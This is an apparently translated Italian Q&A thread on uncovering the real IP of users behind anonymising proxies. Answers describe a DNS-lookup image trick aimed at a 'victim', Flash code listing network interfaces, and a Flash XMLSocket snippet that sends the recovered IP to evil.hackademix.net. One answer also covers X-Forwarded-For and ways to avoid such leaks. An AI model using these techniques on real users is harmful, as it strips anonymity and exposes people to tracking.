Rivela il vero IP di un utente

5

Esiste un metodo di best practice (e preferibilmente documentato) per rivelare il vero IP di un utente che utilizza una connessione HTTP (S)?

I .: Per essere in grado di scoprire il vero IP da proxy trasparenti e anonimi ovunque sia possibile.

    
posta Kyle Rozendo 27.03.2012 - 09:10
fonte

3 risposte

12

Se la connessione utilizza proxy che vengono implementati correttamente, la ricerca dell'ip tramite http o tcp può essere difficile. potresti avere un po 'di fortuna nell'avvicinarti a ip usando DNS. per Se generi la pagina dinamicamente per contenere un'immagine situata in un dominio che controlli, ad es.

<img src="http://123123.deanonymize.mydomain.com"/>

ilbrowsereseguiràunaricercasu123123.deanonymize.mydomain.com.CiòcomporteràunaqueryDNSricorsivacheallafineraggiungeràiltuoDNSpermydomain.com.LaqueryverràoriginatadaqualsiasiDNSutilizzatodallavittima,ingenerel'ISP.Quindi,mentrenontidaràl'IPesatto,potrebbeindicartiunadirezionegenerale.

AFAIK,questometodofunzionaancheselavittimausaTORinmodalitàvaniglia,vedi link per maggiori informazioni.

Un altro modo potrebbe essere usare una java-applet per capire l'IP dal lato del client, ma non sono aggiornato su quali sono i limiti al giorno d'oggi.

    
risposta data 27.03.2012 - 11:31
fonte
3

Ci sono molti modi per farlo. Ecco alcuni altri metodi:

  1. Interfacce di rete di polling (Flash, può ottenere informazioni locali )

    import flash.net.NetworkInfo;
    
    public function findInterface():void
    {
        var results:Vector.<NetworkInterface> =
           NetworkInfo.networkInfo.findInterfaces();
    
        for (var i:int=0; i<results.length; i++)
        {
            var output = output
            + "Name: " + results[i].name + "\n"
            + "DisplayName: " + results[i].displayName + "\n"
            + "MTU: " + results[i].mtu + "\n"
            + "HardwareAddr: " + results[i].hardwareAddress + "\n"
            + "Active: "  + results[i].active + "\n";
    
    
            for (var j:int=0; j<results[i].addresses.length; j++)
            {
               output = output
               + "Addr: " + results[i].addresses[j].address + "\n"
               + "Broadcast: " + results[i].addresses[j].broadcast + "\n"
               + "PrefixLength: " + results[i].addresses[j].prefixLength + "\n"
               + "IPVersion: " + results[i].addresses[j].ipVersion + "\n";
            }
    
            output = output + "\n";
        }
    }
    
  2. Invia un "ping" XML (Flash, influenza solo il browser definito proxy)

    var socket = new XMLSocket();
    socket.onConnect = function(success) {
        socket.onXML = function(doc) {
            getURL("http://evil.hackademix.net/proxy_bypass?ip=" + 
                doc.firstChild.firstChild.nodeValue);
            socket.close();
        };
        socket.send(new XML());
    };
    socket.connect("evil.hackademix.net", 9999);    
    
  3. Tieni presente che tutte le informazioni sull'hardware possono essere rivelate via flash. (Grazie, TildalWave)

  4. Sfruttare plug-in del browser . Tieni presente che questo attacco non ha ripercussioni su di te se utilizzi una VPN, a meno che il plug-in trovi anche un modo per accedere alle informazioni locali in qualche modo. Ciò è dovuto principalmente al fatto che alcuni browser non impongono il proxy impostazioni utilizzate nel browser. La soluzione è utilizzare una VPN che impone la connessione attraverso l'interfaccia connessa. Tuttavia, se il tuo plug-in è in grado di accedere al contenuto locale (lettura / scrittura / esecuzione), tutte le scommesse sono disattivate.

C'è un modo per farlo anche in Java. In sostanza, ti consigliamo di disattivare Java, Flash, Plugin e Javascript, per evitare di essere sottoposti a ping con questi metodi.

    
risposta data 30.11.2015 - 18:52
fonte
2

Nascondere l'IP è il punto di proxy anonimi. Quindi, se quella macchina sta facendo il suo lavoro, non dovrebbe darlo via. Sebbene tu possa provare a eseguire alcuni javascript sul lato client (non sono sicuro se questo funzionerà nel tuo caso.).

Per i proxy trasparenti, ci sono alcune informazioni in questa domanda . Si riduce all'utilizzo dell'intestazione X-Forwarded-For .

    
risposta data 27.03.2012 - 10:00
fonte

Leggi altre domande sui tag